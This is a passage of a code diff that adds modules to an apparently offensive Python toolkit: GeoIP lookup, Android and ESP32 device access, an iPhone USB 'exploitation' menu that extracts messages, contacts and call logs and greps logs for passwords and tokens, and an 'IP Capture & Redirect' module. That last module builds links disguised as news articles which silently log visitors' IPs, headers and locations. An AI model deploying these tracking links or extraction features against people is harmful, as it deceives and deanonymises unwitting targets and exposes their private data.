result['ipv4'] = target
except Exception:
pass
try:
if ipaddress.IPv6Address(target):
result['ipv6'] = target
except Exception:
pass
# Determine IP to lookup
lookup_ip = result['ipv4'] or target
# Try ipwho.is first
print(f"{Colors.CYAN}[*] Querying geolocation APIs...{Colors.RESET}")
geo_data = self._query_ipwhois(lookup_ip)
if not geo_data or geo_data.get('success') is False:
# Fallback to ipinfo.io
geo_data = self._query_ipinfo(lookup_ip)
if geo_data:
result['country_code'] = geo_data.get('country_code') or geo_data.get('country')
result['country'] = geo_data.get('country_name') or geo_data.get('country')
result['region'] = geo_data.get('region')
result['city'] = geo_data.get('city')
result['latitude'] = geo_data.get('latitude') or geo_data.get('lat')
result['longitude'] = geo_data.get('longitude') or geo_data.get('lon')
result['isp'] = geo_data.get('isp') or geo_data.get('org')
result['org'] = geo_data.get('org')
if not result['ipv4']:
result['ipv4'] = geo_data.get('ip')
# Generate map links
if result['latitude'] and result['longitude']:
lat, lon = result['latitude'], result['longitude']
result['map_osm'] = f"https://www.openstreetmap.org/#map=13/{lat}/{lon}"
result['map_google'] = f"https://www.google.com/maps/@{lat},{lon},12z"
return result
def _query_ipwhois(self, ip: str) -> dict:
"""Query ipwho.is API.
Args:
ip: IP address to lookup.
Returns:
Dict with GEO data or None.
"""
try:
url = f"https://ipwho.is/{ip}" if ip else "https://ipwho.is/"
response = self.session.get(url, timeout=self.timeout)
data = response.json()
if data.get('success') is False:
return None
return {
'ip': data.get('ip'),
'country_code': data.get('country_code'),
'country_name': data.get('country'),
'region': data.get('region'),
'city': data.get('city'),
'latitude': data.get('latitude'),
'longitude': data.get('longitude'),
'isp': data.get('connection', {}).get('isp'),
'org': data.get('connection', {}).get('org'),
}
except Exception as e:
print(f"{Colors.DIM} ipwho.is error: {e}{Colors.RESET}")
return None
def _query_ipinfo(self, ip: str) -> dict:
"""Query ipinfo.io API.
Args:
ip: IP address to lookup.
Returns:
Dict with GEO data or None.
"""
try:
url = f"https://ipinfo.io/{ip}/json" if ip else "https://ipinfo.io/json"
response = self.session.get(url, timeout=self.timeout)
data = response.json()
loc = data.get('loc', ',').split(',')
lat = float(loc[0]) if len(loc) > 0 and loc[0] else None
lon = float(loc[1]) if len(loc) > 1 and loc[1] else None
return {
'ip': data.get('ip'),
'country_code': data.get('country'),
'country_name': data.get('country'),
'region': data.get('region'),
'city': data.get('city'),
'latitude': lat,
'longitude': lon,
'isp': data.get('org'),
'org': data.get('org'),
}
except Exception as e:
print(f"{Colors.DIM} ipinfo.io error: {e}{Colors.RESET}")
return None
def lookup_self(self) -> dict:
"""Lookup your own public IP.
Returns:
Dict with geolocation information.
"""
print(f"{Colors.CYAN}[*] Looking up your public IP...{Colors.RESET}")
return self.lookup('')
def bulk_lookup(self, targets: list) -> list:
"""Perform bulk GEO lookups.
Args:
targets: List of IPs/domains to lookup.
Returns:
List of result dicts.
"""
results = []
for i, target in enumerate(targets):
print(f"\n{Colors.CYAN}[{i+1}/{len(targets)}] Looking up: {target}{Colors.RESET}")
result = self.lookup(target)
results.append(result)
time.sleep(0.5) # Rate limiting
return results
def display_result(result: dict):
"""Display lookup result nicely."""
if 'error' in result:
print(f"{Colors.RED}[X] Error: {result['error']}{Colors.RESET}")
return
print(f"\n{Colors.CYAN}{'=' * 50}{Colors.RESET}")
print(f"{Colors.GREEN}{Colors.BOLD}Target:{Colors.RESET} {result['target']}")
print(f"{Colors.CYAN}{'=' * 50}{Colors.RESET}")
if result['ipv4']:
print(f" {Colors.GREEN}IPv4:{Colors.RESET} {result['ipv4']}")
if result['ipv6']:
print(f" {Colors.GREEN}IPv6:{Colors.RESET} {result['ipv6']}")
if result['domain'] and result['domain'] != result['target']:
print(f" {Colors.GREEN}Domain:{Colors.RESET} {result['domain']}")
print()
if result['country_code']:
country_str = f"{result['country_code']}"
if result['country'] and result['country'] != result['country_code']:
country_str += f" ({result['country']})"
print(f" {Colors.GREEN}Country:{Colors.RESET} {country_str}")
if result['region']:
print(f" {Colors.GREEN}Region:{Colors.RESET} {result['region']}")
if result['city']:
print(f" {Colors.GREEN}City:{Colors.RESET} {result['city']}")
if result['isp']:
print(f" {Colors.GREEN}ISP:{Colors.RESET} {result['isp']}")
if result['latitude'] and result['longitude']:
print(f"\n {Colors.GREEN}Coordinates:{Colors.RESET} {result['latitude']}, {result['longitude']}")
if result['map_osm']:
print(f"\n {Colors.DIM}OpenStreetMap: {result['map_osm']}{Colors.RESET}")
if result['map_google']:
print(f" {Colors.DIM}Google Maps: {result['map_google']}{Colors.RESET}")
print()
def display_menu():
"""Display the GEO IP module menu."""
print(f"""
{Colors.CYAN} GEO IP/Domain Lookup{Colors.RESET}
{Colors.DIM} Get geolocation for IPs, domains, and URLs{Colors.RESET}
{Colors.DIM}{'' * 50}{Colors.RESET}
{Colors.GREEN}[1]{Colors.RESET} Lookup IP/Domain/URL
{Colors.GREEN}[2]{Colors.RESET} Lookup My IP
{Colors.GREEN}[3]{Colors.RESET} Bulk Lookup from File
{Colors.RED}[0]{Colors.RESET} Back to OSINT Menu
""")
def run():
"""Main entry point for the module."""
if requests is None:
print(f"{Colors.RED}[X] This module requires 'requests' library{Colors.RESET}")
print(f"{Colors.DIM} Install with: pip install requests{Colors.RESET}")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
return
lookup = GeoIPLookup()
while True:
display_menu()
choice = input(f"{Colors.GREEN}Select option: {Colors.RESET}").strip()
if choice == '0':
break
elif choice == '1':
print(f"\n{Colors.CYAN}Enter IP, domain, or URL:{Colors.RESET}")
print(f"{Colors.DIM}Examples: 8.8.8.8, google.com, https://example.com/path{Colors.RESET}")
target = input(f"\n{Colors.GREEN}Target: {Colors.RESET}").strip()
if not target:
continue
result = lookup.lookup(target)
display_result(result)
input(f"{Colors.DIM}Press Enter to continue...{Colors.RESET}")
elif choice == '2':
result = lookup.lookup_self()
display_result(result)
input(f"{Colors.DIM}Press Enter to continue...{Colors.RESET}")
elif choice == '3':
print(f"\n{Colors.CYAN}Enter path to file with targets (one per line):{Colors.RESET}")
filepath = input(f"\n{Colors.GREEN}File path: {Colors.RESET}").strip()
if not filepath or not os.path.exists(filepath):
print(f"{Colors.RED}[X] File not found{Colors.RESET}")
continue
try:
with open(filepath, 'r') as f:
targets = [line.strip() for line in f if line.strip()]
if not targets:
print(f"{Colors.RED}[X] No targets found in file{Colors.RESET}")
continue
print(f"{Colors.GREEN}[+] Found {len(targets)} targets{Colors.RESET}")
confirm = input(f"\n{Colors.YELLOW}Proceed with lookup? (y/n): {Colors.RESET}").strip().lower()
if confirm == 'y':
results = lookup.bulk_lookup(targets)
for result in results:
display_result(result)
except Exception as e:
print(f"{Colors.RED}[X] Error reading file: {e}{Colors.RESET}")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
else:
print(f"{Colors.RED}[!] Invalid option{Colors.RESET}")
if __name__ == "__main__":
run()

1100
modules/hack_hijack.py Normal file

File diff suppressed because it is too large Load Diff

262
modules/hardware_local.py Normal file
View File

@@ -0,0 +1,262 @@
"""
Hardware Local - Physical device access (ADB/Fastboot/Serial)
Direct access to USB-connected devices on this machine.
"""
DESCRIPTION = "Physical device access (ADB/Fastboot/Serial)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "hardware"
class HardwareLocal:
"""Interactive hardware access menu."""
def __init__(self):
from core.hardware import get_hardware_manager
self.mgr = get_hardware_manager()
def show_menu(self):
status = self.mgr.get_status()
print(f"\n{'='*50}")
print(" Hardware Access (Local)")
print(f"{'='*50}")
print(f" ADB: {'Available' if status['adb'] else 'Not found'}")
print(f" Fastboot: {'Available' if status['fastboot'] else 'Not found'}")
print(f" Serial: {'Available' if status['serial'] else 'Not installed'}")
print(f" ESPTool: {'Available' if status['esptool'] else 'Not installed'}")
print()
print(" 1) List ADB Devices")
print(" 2) ADB Device Info")
print(" 3) ADB Shell")
print(" 4) ADB Sideload/Install")
print(" 5) List Fastboot Devices")
print(" 6) Fastboot Device Info")
print(" 7) Fastboot Flash Partition")
print(" 8) List Serial Ports")
print(" 9) Detect ESP Chip")
print(" 10) Flash ESP32 Firmware")
print(" 0) Back")
print()
def _pick_device(self, devices, label="device"):
if not devices:
print(f" No {label}s found.")
return None
if len(devices) == 1:
return devices[0]['serial']
print(f"\n Select {label}:")
for i, d in enumerate(devices, 1):
extra = d.get('model', '') or d.get('state', '')
print(f" {i}) {d['serial']} {extra}")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
return devices[choice - 1]['serial']
except (ValueError, EOFError):
pass
return None
def list_adb_devices(self):
devices = self.mgr.adb_devices()
if not devices:
print(" No ADB devices connected.")
return
print(f"\n {'Serial':<20} {'State':<12} {'Model':<15} {'Product'}")
print(f" {'-'*60}")
for d in devices:
print(f" {d['serial']:<20} {d['state']:<12} {d.get('model',''):<15} {d.get('product','')}")
def adb_device_info(self):
devices = self.mgr.adb_devices()
serial = self._pick_device(devices, "ADB device")
if not serial:
return
info = self.mgr.adb_device_info(serial)
print(f"\n Device Info: {serial}")
print(f" {'-'*40}")
for k, v in info.items():
print(f" {k:<20} {v}")
def adb_shell(self):
devices = self.mgr.adb_devices()
serial = self._pick_device(devices, "ADB device")
if not serial:
return
print(f" ADB Shell ({serial}) - type 'exit' to quit")
while True:
try:
cmd = input(f" {serial}$ ").strip()
except (EOFError, KeyboardInterrupt):
break
if cmd.lower() in ('exit', 'quit', ''):
break
result = self.mgr.adb_shell(serial, cmd)
if result['output']:
print(result['output'])
def adb_sideload(self):
devices = self.mgr.adb_devices()
serial = self._pick_device(devices, "ADB device")
if not serial:
return
try:
filepath = input(" File path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not filepath:
return
result = self.mgr.adb_sideload(serial, filepath)
if result.get('success'):
print(f" Sideload started (op: {result['op_id']})")
# Poll progress
import time
while True:
time.sleep(1)
prog = self.mgr.get_operation_progress(result['op_id'])
print(f" [{prog.get('progress', 0)}%] {prog.get('message', '')}", end='\r')
if prog.get('status') in ('done', 'error'):
print()
break
else:
print(f" Error: {result.get('error', 'Unknown error')}")
def list_fastboot_devices(self):
devices = self.mgr.fastboot_devices()
if not devices:
print(" No Fastboot devices connected.")
return
print(f"\n {'Serial':<25} {'State'}")
print(f" {'-'*35}")
for d in devices:
print(f" {d['serial']:<25} {d['state']}")
def fastboot_device_info(self):
devices = self.mgr.fastboot_devices()
serial = self._pick_device(devices, "Fastboot device")
if not serial:
return
info = self.mgr.fastboot_device_info(serial)
print(f"\n Fastboot Info: {serial}")
print(f" {'-'*40}")
for k, v in info.items():
print(f" {k:<20} {v}")
def fastboot_flash(self):
devices = self.mgr.fastboot_devices()
serial = self._pick_device(devices, "Fastboot device")
if not serial:
return
try:
partition = input(" Partition (boot/recovery/system/vendor): ").strip()
filepath = input(" Firmware path: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not partition or not filepath:
return
result = self.mgr.fastboot_flash(serial, partition, filepath)
if result.get('success'):
print(f" Flash started (op: {result['op_id']})")
import time
while True:
time.sleep(1)
prog = self.mgr.get_operation_progress(result['op_id'])
print(f" [{prog.get('progress', 0)}%] {prog.get('message', '')}", end='\r')
if prog.get('status') in ('done', 'error'):
print()
break
else:
print(f" Error: {result.get('error', 'Unknown error')}")
def list_serial_ports(self):
ports = self.mgr.list_serial_ports()
if not ports:
print(" No serial ports found.")
return
print(f"\n {'Port':<20} {'Description':<30} {'VID:PID'}")
print(f" {'-'*60}")
for p in ports:
vid_pid = f"{p['vid']}:{p['pid']}" if p['vid'] else ''
print(f" {p['port']:<20} {p['desc']:<30} {vid_pid}")
def detect_esp(self):
ports = self.mgr.list_serial_ports()
if not ports:
print(" No serial ports found.")
return
print(" Select port:")
for i, p in enumerate(ports, 1):
print(f" {i}) {p['port']} - {p['desc']}")
try:
choice = int(input(" > ").strip())
port = ports[choice - 1]['port']
except (ValueError, IndexError, EOFError):
return
result = self.mgr.detect_esp_chip(port)
if result.get('success'):
print(f" Chip: {result['chip']}")
print(f" ID: {result.get('chip_id', 'N/A')}")
else:
print(f" Error: {result.get('error', 'Detection failed')}")
def flash_esp(self):
ports = self.mgr.list_serial_ports()
if not ports:
print(" No serial ports found.")
return
print(" Select port:")
for i, p in enumerate(ports, 1):
print(f" {i}) {p['port']} - {p['desc']}")
try:
choice = int(input(" > ").strip())
port = ports[choice - 1]['port']
firmware = input(" Firmware path: ").strip()
except (ValueError, IndexError, EOFError):
return
if not firmware:
return
result = self.mgr.flash_esp(port, firmware)
if result.get('success'):
print(f" Flash started (op: {result['op_id']})")
import time
while True:
time.sleep(1)
prog = self.mgr.get_operation_progress(result['op_id'])
print(f" [{prog.get('progress', 0)}%] {prog.get('message', '')}", end='\r')
if prog.get('status') in ('done', 'error'):
print()
break
else:
print(f" Error: {result.get('error', 'Flash failed')}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.list_adb_devices,
'2': self.adb_device_info,
'3': self.adb_shell,
'4': self.adb_sideload,
'5': self.list_fastboot_devices,
'6': self.fastboot_device_info,
'7': self.fastboot_flash,
'8': self.list_serial_ports,
'9': self.detect_esp,
'10': self.flash_esp,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
hw = HardwareLocal()
hw.run_interactive()

View File

@@ -0,0 +1,25 @@
"""
Hardware Remote - Remote physical device access via web UI
Devices connected to the AUTARCH server are accessible through the web browser.
"""
DESCRIPTION = "Remote physical device access (via web UI)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "hardware"
def run():
print("\n Hardware Remote Access")
print(" " + "=" * 40)
print(" Remote hardware access is available through the web UI.")
print(" Devices plugged into this server (USB/Serial) can be")
print(" managed remotely via your browser.")
print()
print(" Start the web server with: python3 autarch.py --web")
print(" Then navigate to: http://<server-ip>:5000/hardware")
print()
print(" Supported devices:")
print(" - Android (ADB/Fastboot)")
print(" - ESP32 (Serial flash/monitor)")
print()

1555
modules/incident_resp.py Normal file

File diff suppressed because it is too large Load Diff

427
modules/ipcapture.py Normal file
View File

@@ -0,0 +1,427 @@
"""IP Capture & Redirect — stealthy link tracking for OSINT.
Create disguised links that capture visitor IP + metadata,
then redirect to a legitimate target URL. Fast 302 redirect,
realistic URL paths, no suspicious indicators.
"""
DESCRIPTION = "IP Capture & Redirect — stealthy link tracking"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "osint"
import os
import json
import time
import random
import string
import hashlib
import threading
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# ── Realistic URL path generation ────────────────────────────────────────────
_WORD_POOL = [
'tech', 'news', 'science', 'world', 'business', 'health', 'politics',
'sports', 'culture', 'opinion', 'breaking', 'latest', 'update', 'report',
'analysis', 'insight', 'review', 'guide', 'how-to', 'explained',
'ai', 'climate', 'economy', 'security', 'research', 'innovation',
'digital', 'global', 'local', 'industry', 'future', 'trends',
'development', 'infrastructure', 'community', 'education', 'policy',
]
_TITLE_PATTERNS = [
'{adj}-{noun}-{verb}-{year}-{noun2}',
'{noun}-{adj}-{noun2}-{verb}',
'new-{noun}-{verb}-{adj}-{noun2}',
'{noun}-report-{year}-{adj}-{noun2}',
'how-{noun}-is-{verb}-the-{noun2}',
'{adj}-{noun}-breakthrough-{noun2}',
]
_ADJECTIVES = [
'major', 'new', 'latest', 'critical', 'emerging', 'global',
'innovative', 'surprising', 'important', 'unprecedented',
]
_NOUNS = [
'technology', 'researchers', 'companies', 'governments', 'scientists',
'industry', 'market', 'community', 'experts', 'development',
]
_VERBS = [
'changing', 'transforming', 'disrupting', 'advancing', 'impacting',
'reshaping', 'driving', 'revealing', 'challenging', 'accelerating',
]
def _generate_article_path() -> str:
"""Generate a realistic-looking article URL path."""
now = datetime.now()
year = now.strftime('%Y')
month = now.strftime('%m')
pattern = random.choice(_TITLE_PATTERNS)
slug = pattern.format(
adj=random.choice(_ADJECTIVES),
noun=random.choice(_NOUNS),
noun2=random.choice(_NOUNS),
verb=random.choice(_VERBS),
year=year,
)
# Article-style path
styles = [
f'/article/{year}/{month}/{slug}',
f'/news/{year}/{slug}',
f'/stories/{slug}-{random.randint(1000, 9999)}',
f'/p/{slug}',
f'/read/{hashlib.md5(slug.encode()).hexdigest()[:8]}',
]
return random.choice(styles)
def _generate_short_key(length: int = 8) -> str:
"""Generate a short random key."""
chars = string.ascii_lowercase + string.digits
return ''.join(random.choices(chars, k=length))
# ── IP Capture Service ───────────────────────────────────────────────────────
class IPCaptureService:
"""Manage capture links and record visitor metadata."""
def __init__(self):
self._file = os.path.join(get_data_dir(), 'osint_captures.json')
self._links = {}
self._lock = threading.Lock()
self._load()
def _load(self):
if os.path.exists(self._file):
try:
with open(self._file, 'r') as f:
self._links = json.load(f)
except Exception:
self._links = {}
def _save(self):
os.makedirs(os.path.dirname(self._file), exist_ok=True)
with open(self._file, 'w') as f:
json.dump(self._links, f, indent=2)
def create_link(self, target_url: str, name: str = '',
disguise: str = 'article') -> dict:
"""Create a new capture link.
Args:
target_url: The legitimate URL to redirect to after capture.
name: Friendly name for this link.
disguise: URL style — 'short', 'article', or 'custom'.
Returns:
Dict with key, paths, and full URLs.
"""
key = _generate_short_key()
if disguise == 'article':
article_path = _generate_article_path()
elif disguise == 'short':
article_path = f'/c/{key}'
else:
article_path = f'/c/{key}'
with self._lock:
self._links[key] = {
'key': key,
'name': name or f'Link {key}',
'target_url': target_url,
'disguise': disguise,
'article_path': article_path,
'short_path': f'/c/{key}',
'created': datetime.now().isoformat(),
'captures': [],
'active': True,
}
self._save()
return {
'ok': True,
'key': key,
'short_path': f'/c/{key}',
'article_path': article_path,
'target_url': target_url,
}
def get_link(self, key: str) -> Optional[dict]:
return self._links.get(key)
def list_links(self) -> List[dict]:
return list(self._links.values())
def delete_link(self, key: str) -> bool:
with self._lock:
if key in self._links:
del self._links[key]
self._save()
return True
return False
def find_by_path(self, path: str) -> Optional[dict]:
"""Find a link by its article path."""
for link in self._links.values():
if link.get('article_path') == path:
return link
return None
def record_capture(self, key: str, ip: str, user_agent: str = '',
accept_language: str = '', referer: str = '',
headers: dict = None) -> bool:
"""Record a visitor capture."""
with self._lock:
link = self._links.get(key)
if not link or not link.get('active'):
return False
capture = {
'ip': ip,
'timestamp': datetime.now().isoformat(),
'user_agent': user_agent,
'accept_language': accept_language,
'referer': referer,
}
# Extract extra metadata from headers
if headers:
for h in ['X-Forwarded-For', 'CF-Connecting-IP', 'X-Real-IP']:
val = headers.get(h, '')
if val:
capture[f'header_{h.lower().replace("-","_")}'] = val
# Connection hints
for h in ['Sec-CH-UA', 'Sec-CH-UA-Platform', 'Sec-CH-UA-Mobile',
'DNT', 'Upgrade-Insecure-Requests']:
val = headers.get(h, '')
if val:
capture[f'hint_{h.lower().replace("-","_")}'] = val
# GeoIP lookup (best-effort)
try:
geo = self._geoip_lookup(ip)
if geo:
capture['geo'] = geo
except Exception:
pass
link['captures'].append(capture)
self._save()
return True
def _geoip_lookup(self, ip: str) -> Optional[dict]:
"""Best-effort GeoIP lookup using the existing geoip module."""
try:
from modules.geoip import GeoIPLookup
geo = GeoIPLookup()
result = geo.lookup(ip)
if result and result.get('success'):
return {
'country': result.get('country', ''),
'region': result.get('region', ''),
'city': result.get('city', ''),
'isp': result.get('isp', ''),
'lat': result.get('latitude', ''),
'lon': result.get('longitude', ''),
}
except Exception:
pass
return None
def get_captures(self, key: str) -> List[dict]:
link = self._links.get(key)
return link.get('captures', []) if link else []
def get_stats(self, key: str) -> dict:
link = self._links.get(key)
if not link:
return {}
captures = link.get('captures', [])
unique_ips = set(c['ip'] for c in captures)
return {
'total': len(captures),
'unique_ips': len(unique_ips),
'first': captures[0]['timestamp'] if captures else None,
'last': captures[-1]['timestamp'] if captures else None,
}
def export_captures(self, key: str, fmt: str = 'json') -> str:
"""Export captures to JSON or CSV string."""
captures = self.get_captures(key)
if fmt == 'csv':
if not captures:
return 'ip,timestamp,user_agent,country,city\n'
lines = ['ip,timestamp,user_agent,country,city']
for c in captures:
geo = c.get('geo', {})
lines.append(','.join([
c.get('ip', ''),
c.get('timestamp', ''),
f'"{c.get("user_agent", "")}"',
geo.get('country', ''),
geo.get('city', ''),
]))
return '\n'.join(lines)
return json.dumps(captures, indent=2)
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
_lock = threading.Lock()
def get_ip_capture() -> IPCaptureService:
global _instance
if _instance is None:
with _lock:
if _instance is None:
_instance = IPCaptureService()
return _instance
# ── Interactive CLI ──────────────────────────────────────────────────────────
def run():
"""Interactive CLI for IP Capture & Redirect."""
service = get_ip_capture()
while True:
print("\n" + "=" * 60)
print(" IP CAPTURE & REDIRECT")
print(" Stealthy link tracking for OSINT")
print("=" * 60)
links = service.list_links()
active = sum(1 for l in links if l.get('active'))
total_captures = sum(len(l.get('captures', [])) for l in links)
print(f" Active links: {active} | Total captures: {total_captures}")
print()
print(" 1 — Create Capture Link")
print(" 2 — List Active Links")
print(" 3 — View Captures")
print(" 4 — Delete Link")
print(" 5 — Export Captures")
print(" 0 — Back")
print()
choice = input(" Select: ").strip()
if choice == '0':
break
elif choice == '1':
_cli_create(service)
elif choice == '2':
_cli_list(service)
elif choice == '3':
_cli_view(service)
elif choice == '4':
_cli_delete(service)
elif choice == '5':
_cli_export(service)
def _cli_create(service: IPCaptureService):
"""Create a new capture link."""
print("\n--- Create Capture Link ---")
target = input(" Target URL (redirect destination): ").strip()
if not target:
print(" [!] URL required")
return
if not target.startswith(('http://', 'https://')):
target = 'https://' + target
name = input(" Friendly name []: ").strip()
print(" Disguise type:")
print(" 1 — Article URL (realistic path)")
print(" 2 — Short URL (/c/xxxxx)")
dtype = input(" Select [1]: ").strip() or '1'
disguise = 'article' if dtype == '1' else 'short'
result = service.create_link(target, name, disguise)
if result['ok']:
print(f"\n [+] Link created!")
print(f" Key: {result['key']}")
print(f" Short URL: <your-host>{result['short_path']}")
print(f" Article URL: <your-host>{result['article_path']}")
print(f" Redirects to: {result['target_url']}")
else:
print(f" [-] {result.get('error', 'Failed')}")
def _cli_list(service: IPCaptureService):
"""List all active links."""
links = service.list_links()
if not links:
print("\n No capture links")
return
print(f"\n--- Active Links ({len(links)}) ---")
for l in links:
stats = service.get_stats(l['key'])
active = "ACTIVE" if l.get('active') else "DISABLED"
print(f"\n [{l['key']}] {l.get('name', 'Unnamed')}{active}")
print(f" Target: {l['target_url']}")
print(f" Short: {l['short_path']}")
print(f" Article: {l.get('article_path', 'N/A')}")
print(f" Captures: {stats.get('total', 0)} ({stats.get('unique_ips', 0)} unique)")
if stats.get('last'):
print(f" Last hit: {stats['last']}")
def _cli_view(service: IPCaptureService):
"""View captures for a link."""
key = input(" Link key: ").strip()
captures = service.get_captures(key)
if not captures:
print(" No captures for this link")
return
print(f"\n--- Captures ({len(captures)}) ---")
for c in captures:
geo = c.get('geo', {})
location = f"{geo.get('city', '?')}, {geo.get('country', '?')}" if geo else 'Unknown'
print(f" {c['timestamp']} {c['ip']:>15} {location}")
if c.get('user_agent'):
ua = c['user_agent'][:80] + ('...' if len(c.get('user_agent', '')) > 80 else '')
print(f" UA: {ua}")
def _cli_delete(service: IPCaptureService):
"""Delete a link."""
key = input(" Link key to delete: ").strip()
if service.delete_link(key):
print(" [+] Link deleted")
else:
print(" [-] Link not found")
def _cli_export(service: IPCaptureService):
"""Export captures."""
key = input(" Link key: ").strip()
fmt = input(" Format (json/csv) [json]: ").strip() or 'json'
data = service.export_captures(key, fmt)
print(f"\n{data}")
save = input("\n Save to file? [y/N]: ").strip().lower()
if save == 'y':
ext = 'csv' if fmt == 'csv' else 'json'
filepath = os.path.join(get_data_dir(), 'exports', f'captures_{key}.{ext}')
os.makedirs(os.path.dirname(filepath), exist_ok=True)
with open(filepath, 'w') as f:
f.write(data)
print(f" [+] Saved to {filepath}")

402
modules/iphone_local.py Normal file
View File

@@ -0,0 +1,402 @@
"""
iPhone Local USB - Device access via libimobiledevice
"""
DESCRIPTION = "iPhone USB exploitation (info, backup, extract, apps, profiles)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "hardware"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
class IPhoneLocal:
"""Interactive menu for iPhone USB device access."""
def __init__(self):
from core.iphone_exploit import get_iphone_manager
self.mgr = get_iphone_manager()
self.udid = None
def _select_device(self):
devices = self.mgr.list_devices()
if not devices:
print(" No iOS devices connected.")
return
if len(devices) == 1:
self.udid = devices[0]['udid']
print(f" Selected: {devices[0].get('name','')} ({self.udid[:12]}...)")
return
print("\n Select device:")
for i, d in enumerate(devices, 1):
print(f" {i}) {d.get('name','')} - {d.get('model','')} iOS {d.get('ios_version','')} [{d['udid'][:12]}...]")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(devices):
self.udid = devices[choice - 1]['udid']
except (ValueError, EOFError, KeyboardInterrupt):
pass
def _ensure_device(self):
if not self.udid:
self._select_device()
return self.udid is not None
def show_menu(self):
status = self.mgr.get_status()
print(f"\n{'='*60}")
print(" iPhone USB Exploitation")
print(f"{'='*60}")
print(f" Tools: {status['found']}/{status['total']} available")
print(f" Device: {self.udid[:16] + '...' if self.udid else '(none)'}")
print()
print(" ── Device ──")
print(" [1] List Devices")
print(" [2] Device Info")
print(" [3] Full Fingerprint")
print(" [4] Pair / Validate")
print(" [5] Get/Set Device Name")
print(" [6] Restart / Shutdown / Sleep")
print()
print(" ── Capture ──")
print(" [10] Screenshot")
print(" [11] Syslog Dump")
print(" [12] Syslog Grep (sensitive)")
print(" [13] Crash Reports")
print()
print(" ── Apps ──")
print(" [20] List Apps")
print(" [21] Install IPA")
print(" [22] Uninstall App")
print()
print(" ── Backup & Extraction ──")
print(" [30] Create Backup")
print(" [31] List Backups")
print(" [32] Extract SMS/iMessage")
print(" [33] Extract Contacts")
print(" [34] Extract Call Log")
print(" [35] Extract Notes")
print(" [36] Browse Backup Files")
print(" [37] Extract Backup File")
print()
print(" ── Filesystem & Profiles ──")
print(" [40] Mount Filesystem (ifuse)")
print(" [41] Mount App Documents")
print(" [42] Unmount")
print(" [43] List Profiles")
print(" [44] Install Profile")
print(" [45] Remove Profile")
print()
print(" ── Network ──")
print(" [50] Port Forward (iproxy)")
print(" [51] Export Recon Report")
print()
print(" [s] Select Device")
print(" [0] Back")
print()
def _pick_backup(self):
backups = self.mgr.list_backups()
if not backups['backups']:
print(" No backups found. Create one first.")
return None
print("\n Available backups:")
for i, b in enumerate(backups['backups'], 1):
name = b.get('device_name', b['udid'][:12])
size = b.get('size_mb', 0)
print(f" {i}) {name} - {b.get('ios_version','')} ({size:.0f} MB)")
try:
choice = int(input(" > ").strip())
if 1 <= choice <= len(backups['backups']):
return backups['backups'][choice - 1]['path']
except (ValueError, EOFError, KeyboardInterrupt):
pass
return None
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
elif choice == 's':
self._select_device()
continue
try:
self._dispatch(choice)
except (EOFError, KeyboardInterrupt):
continue
def _dispatch(self, choice):
m = self.mgr
# Device
if choice == '1':
devices = m.list_devices()
if not devices:
print(" No iOS devices connected.")
else:
print(f"\n {'UDID':<42} {'Name':<20} {'Model':<15} iOS")
print(f" {'-'*85}")
for d in devices:
print(f" {d['udid']:<42} {d.get('name',''):<20} {d.get('model',''):<15} {d.get('ios_version','')}")
elif choice == '2':
if not self._ensure_device(): return
info = m.device_info(self.udid)
if 'error' in info:
print(f" Error: {info['error']}")
else:
for k, v in list(info.items())[:40]:
print(f" {k:<35} {v}")
if len(info) > 40:
print(f" ... and {len(info)-40} more fields")
elif choice == '3':
if not self._ensure_device(): return
fp = m.full_fingerprint(self.udid)
for k, v in list(fp.items())[:50]:
if isinstance(v, dict):
print(f" {k}:")
for sk, sv in list(v.items())[:10]:
print(f" {sk}: {sv}")
else:
print(f" {k:<35} {v}")
elif choice == '4':
if not self._ensure_device(): return
action = input(" [p]air / [v]alidate / [u]npair? ").strip().lower()
if action == 'p':
r = m.pair_device(self.udid)
elif action == 'u':
r = m.unpair_device(self.udid)
else:
r = m.validate_pair(self.udid)
print(f" {r.get('output', r)}")
elif choice == '5':
if not self._ensure_device(): return
r = m.get_name(self.udid)
print(f" Current name: {r['name']}")
new = input(" New name (Enter to keep): ").strip()
if new:
m.set_name(self.udid, new)
print(f" Name set to: {new}")
elif choice == '6':
if not self._ensure_device(): return
action = input(" [r]estart / [s]hutdown / s[l]eep? ").strip().lower()
if action == 'r':
r = m.restart_device(self.udid)
elif action == 's':
r = m.shutdown_device(self.udid)
elif action == 'l':
r = m.sleep_device(self.udid)
else:
print(" Invalid."); return
print(f" {r.get('output', 'Done')}")
# Capture
elif choice == '10':
if not self._ensure_device(): return
r = m.screenshot(self.udid)
if r['success']:
print(f" Screenshot: {r['path']} ({r['size']} bytes)")
else:
print(f" Error: {r['error']}")
elif choice == '11':
if not self._ensure_device(): return
dur = input(" Duration [5]: ").strip()
r = m.syslog_dump(self.udid, duration=int(dur) if dur else 5)
if r['success']:
print(f" Syslog: {r['path']} ({r['lines']} lines)")
else:
print(f" Error: {r['error']}")
elif choice == '12':
if not self._ensure_device(): return
pattern = input(" Grep pattern [password|token|key]: ").strip() or 'password|token|key|secret'
dur = input(" Duration [5]: ").strip()
r = m.syslog_grep(self.udid, pattern, duration=int(dur) if dur else 5)
print(f" {r['count']} matches:")
for line in r.get('matches', [])[:20]:
print(f" {line[:120]}")
elif choice == '13':
if not self._ensure_device(): return
r = m.crash_reports(self.udid)
if r['success']:
